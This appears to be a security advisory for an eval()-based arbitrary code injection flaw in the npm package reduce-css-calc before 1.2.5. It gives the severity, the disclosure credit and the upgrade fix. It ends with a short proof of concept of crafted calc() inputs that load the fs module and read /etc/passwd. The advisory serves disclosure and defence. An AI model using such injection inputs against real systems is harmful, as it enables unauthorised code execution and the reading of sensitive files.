Arbitrary Code Injection Affecting reduce-css-calc package, versions <1.2.5



    Attack Complexity Low
    User Interaction Required
    Scope Changed

    Threat Intelligence

    EPSS 0.19% (56th percentile)
Expand this section
6.1 medium

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID npm:reduce-css-calc:20160913
  • published 17 Oct 2016
  • disclosed 20 Aug 2016
  • credit Сковорода Никита Андреевич (ChALkeR)

How to fix?

Upgrade reduce-css-calc version 1.2.5 or greater.


reduce-css-calc is a package that reduces CSS calc() function to the maximum. Affected versions of the package used eval() for evaluation the expression, allowing the attacker to gain arbitrary code execution via specially crafted input.


The issue was reported by ChALkeR and demonstrated by his example below:

const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc(                       (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc(                       (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc(                       (fs['readFileSync']("/etc/passwd", "utf-8")))`));